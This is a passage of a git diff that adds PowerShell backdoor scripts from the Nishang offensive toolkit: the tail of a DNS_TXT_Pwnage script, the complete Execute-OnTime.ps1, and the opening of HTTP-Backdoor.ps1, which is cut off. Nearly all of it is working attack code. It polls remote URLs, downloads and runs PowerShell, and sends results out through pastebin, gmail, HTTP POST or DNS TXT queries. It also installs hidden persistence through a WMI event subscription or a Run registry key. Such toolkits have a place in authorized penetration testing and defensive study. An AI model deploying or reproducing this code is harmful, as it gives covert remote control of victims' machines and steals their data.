#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $pastevalue)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = $pastename
|
||||||
|
$msg.Body = $pastevalue
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$lengthofsubstr = 0
|
||||||
|
$code = Compress-Encode
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
|
||||||
|
$modulename = "DNS_TXT_Pwnage.ps1"
|
||||||
|
if($persist -eq $True)
|
||||||
|
{
|
||||||
|
$name = "persist.vbs"
|
||||||
|
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
|
||||||
|
{
|
||||||
|
$scriptpath = $env:TEMP
|
||||||
|
$scriptFileName = "$scriptpath\$name"
|
||||||
|
$filterNS = "root\cimv2"
|
||||||
|
$wmiNS = "root\subscription"
|
||||||
|
$query = @"
|
||||||
|
Select * from __InstanceCreationEvent within 30
|
||||||
|
where targetInstance isa 'Win32_LogonSession'
|
||||||
|
"@
|
||||||
|
$filterName = "WindowsSanity"
|
||||||
|
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
|
||||||
|
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
|
||||||
|
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
|
||||||
|
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
Invoke-Expression $env:TEMP\$modulename
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
305
aspx/nishang/Backdoors/Execute-OnTime.ps1
Normal file
305
aspx/nishang/Backdoors/Execute-OnTime.ps1
Normal file
|
@ -0,0 +1,305 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which waits till given time to execute a script.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
|
||||||
|
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
|
||||||
|
|
||||||
|
|
||||||
|
.PARAMETER PayloadURL
|
||||||
|
The URL from where the file would be downloaded.
|
||||||
|
|
||||||
|
.PARAMETER time
|
||||||
|
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
|
||||||
|
|
||||||
|
.PARAMETER CheckURL
|
||||||
|
The URL which the payload would check for instructions to stop.
|
||||||
|
|
||||||
|
.PARAMETER StopString
|
||||||
|
The string which if found at CheckURL will stop the payload.
|
||||||
|
|
||||||
|
.PARAMETER persist
|
||||||
|
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
|
||||||
|
|
||||||
|
PARAMETER exfil
|
||||||
|
Use this parameter to use exfiltration methods for returning the results.
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER AuthNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
|
||||||
|
|
||||||
|
EXAMPLE
|
||||||
|
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
|
||||||
|
|
||||||
|
Use above when using the payload from non-interactive shells.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Execute-OnTime -persist
|
||||||
|
|
||||||
|
Use above for reboot persistence.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Execute-OnTime
|
||||||
|
{
|
||||||
|
|
||||||
|
|
||||||
|
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$persist,
|
||||||
|
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$exfil,
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$PayloadURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$time,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$CheckURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$StopString,
|
||||||
|
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$dev_key = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$username = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$password = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$URL = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$DomainName = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$AuthNS = "null"
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
$body = @'
|
||||||
|
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
|
||||||
|
{
|
||||||
|
|
||||||
|
while($true)
|
||||||
|
{
|
||||||
|
$exec = 0
|
||||||
|
start-sleep -seconds 5
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$filecontent = $webclient.DownloadString("$CheckURL")
|
||||||
|
$systime = Get-Date -UFormat %R
|
||||||
|
if ($systime -match $time)
|
||||||
|
{
|
||||||
|
|
||||||
|
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
|
||||||
|
$pastevalue
|
||||||
|
$exec++
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
|
||||||
|
}
|
||||||
|
if ($exec -eq 1)
|
||||||
|
{
|
||||||
|
Start-Sleep -Seconds 60
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($filecontent -eq $StopString)
|
||||||
|
{
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
$exfiltration = @'
|
||||||
|
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
|
||||||
|
{
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $pastevalue)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = $pastename
|
||||||
|
$msg.Body = $pastevalue
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
$Data
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$lengthofsubstr = 0
|
||||||
|
$code = Compress-Encode
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
$modulename = "Execute-OnTime.ps1"
|
||||||
|
if($persist -eq $True)
|
||||||
|
{
|
||||||
|
|
||||||
|
$name = "persist.vbs"
|
||||||
|
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
|
||||||
|
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
|
||||||
|
{
|
||||||
|
$scriptpath = $env:TEMP
|
||||||
|
$scriptFileName = "$scriptpath\$name"
|
||||||
|
$filterNS = "root\cimv2"
|
||||||
|
$wmiNS = "root\subscription"
|
||||||
|
$query = @"
|
||||||
|
Select * from __InstanceCreationEvent within 30
|
||||||
|
where targetInstance isa 'Win32_LogonSession'
|
||||||
|
"@
|
||||||
|
$filterName = "WindowsSanity"
|
||||||
|
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
|
||||||
|
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
|
||||||
|
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
|
||||||
|
}
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append $env:TEMP\$modulename
|
||||||
|
Invoke-Expression $env:TEMP\$modulename
|
||||||
|
}
|
||||||
|
}
|
309
aspx/nishang/Backdoors/HTTP-Backdoor.ps1
Normal file
309
aspx/nishang/Backdoors/HTTP-Backdoor.ps1
Normal file
|
@ -0,0 +1,309 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
|
||||||
|
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
|
||||||
|
the string given in StopString variable.
|
||||||
|
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
|
||||||
|
|
||||||
|
|
||||||
|
.PARAMETER CheckURL
|
||||||
|
The URL which the payload would query for instructions.
|
||||||
|
|
||||||
|
.PARAMETER PayloadURL
|
||||||
|
The URL from where the powershell script would be downloaded.
|
||||||
|
|
||||||
|
.PARAMETER MagicString
|
||||||
|
The string which would act as an instruction to the payload to proceed with download and execute.
|
||||||
|
|
||||||
|
.PARAMETER StopString
|
||||||
|
The string which if found at CheckURL will stop the payload.
|
||||||
|
|
||||||
|
.PARAMETER persist
|
||||||
|
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
|
||||||
|
|
||||||
|
.PARAMETER exfil
|
||||||
|
Use this parameter to use exfiltration methods for returning the results.
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER AuthNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName
|
||||||
|
|
||||||
|
.Example
|
||||||
|
|
||||||
|
PS > HTTP-Backdoor
|
||||||
|
|
||||||
|
The payload will ask for all required options.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
|
||||||
|
|
||||||
|
Use above when using the payload from non-interactive shells.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS <dns>
|
||||||
|
|
||||||
|
Use above command for using exfiltration methods.
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > HTTP-Backdoor -persist
|
||||||
|
|
||||||
|
Use above for reboot persistence.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function HTTP-Backdoor
|
||||||
|
{
|
||||||
|
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$persist,
|
||||||
|
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$exfil,
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$CheckURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$PayloadURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$MagicString,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$StopString,
|
||||||
|
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$dev_key = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$username = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$password = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$URL = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$DomainName = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$AuthNS = "null"
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
$body = @'
|
||||||
|
function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
|
||||||
|
{
|
||||||
|
while($true)
|
||||||
|
{
|
||||||
|
$exec = 0
|
||||||
|
start-sleep -seconds 5
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$filecontent = $webclient.DownloadString("$CheckURL")
|
||||||
|
if($filecontent -eq $MagicString)
|
||||||
|
{
|
||||||
|
|
||||||
|
$script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
|
||||||
|
$pastevalue
|
||||||
|
$exec++
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
|
||||||
|
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
|
||||||
|
}
|
||||||
|
if ($exec -eq 1)
|
||||||
|
{
|
||||||
|
Start-Sleep -Seconds 60
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($filecontent -eq $StopString)
|
||||||
|
{
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
|
||||||
|
$exfiltration = @'
|
||||||
|
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
|
||||||
|
{
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $pastevalue)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
